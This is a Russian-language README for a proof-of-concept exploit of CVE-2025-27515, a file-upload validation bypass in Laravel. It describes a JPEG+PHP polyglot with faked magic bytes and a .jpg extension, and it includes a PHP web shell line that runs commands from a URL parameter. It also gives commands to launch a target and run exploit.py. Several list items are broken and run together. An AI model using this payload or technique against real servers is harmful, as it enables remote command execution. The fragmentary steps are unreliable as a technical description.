
PoC для CVE-2025-27515
Практическая демонстрация CVE-2025-27515, уязвимости обхода проверки загрузки файлов в Laravel Framework (≤ 12.0.0).
CVE-2025-27515 — это обход проверки, позволяющий атакующим обойти ограничения на загрузку файлов, когда приложения Laravel используют шаблоны проверки с подстановочными знаками (files.*). Уязвимость позволяет загружать вредоносные файлы, эксплуатируя слабые места в обработке Laravel загрузок файлов на основе массивов.
Серьезность: Средняя/Высокая
CWE: CWE-20 (Некорректная проверка входных данных)
Эксплойт использует полиглот JPEG+PHP файл, который:
FF D8 FF E0) для обхода проверки MIME-типа<?php system($_GET['cmd']); ?>).jpg для прохождения проверок расширения файлаphp artisan serve
# Доступ по адресу http://localhost:8000/upload
Версия на Python:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНОГО И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Автор: Guaxinim | Исследования в области кибербезопасности